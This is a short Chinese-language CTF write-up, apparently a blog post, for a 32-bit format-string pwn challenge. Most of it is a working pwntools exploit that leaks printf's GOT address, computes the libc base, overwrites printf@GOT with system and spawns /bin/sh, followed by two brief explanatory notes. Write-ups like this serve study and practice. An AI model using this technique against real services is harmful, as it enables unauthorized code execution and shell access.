首先看exp:
from os import system
from pwn import*
p=remote('node4.buuoj.cn',29623)
elf=ELF('./fmt32')
libc=ELF('./libc-2.23.so')
printf_got=elf.got['printf']
paylaod1= b'a'+p32(printf_got)+ b'mm'+b'%8$s'
p.sendlineafter("me:",paylaod1)
p.recvuntil("mm")
addr_=u32(p.recv(4))
base = addr_-libc.symbols['printf']
system_=base + libc.symbols['system']
paylaod2=b'a'+fmtstr_payload(8,{printf_got:system_},numbwritten=0xa,write_size='byte')
p.sendline(paylaod2)
p.sendline(";/bin/sh\x00")
p.interactive()
值得注意的有这么几点:
1:paylaod1= b'a'+p32(printf_got)+ b'mm'+b'%8$s'这里第一个“a”是为了使数据上的栈对齐,从而使得后面往格式化字符串后第八个参数能够成功被输出。
2:paylaod2=b'a'+fmtstr_payload(8,{printf_got:system_},numbwritten=0xa,write_size='byte')这个fmtstr_payload的功能简单来说就是使偏移所在处的参数首先作为地址,而后将其指向的地方进行修改"{printf_got:system_}"就是在干这件事情。
具体细节请看这位师傅的
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
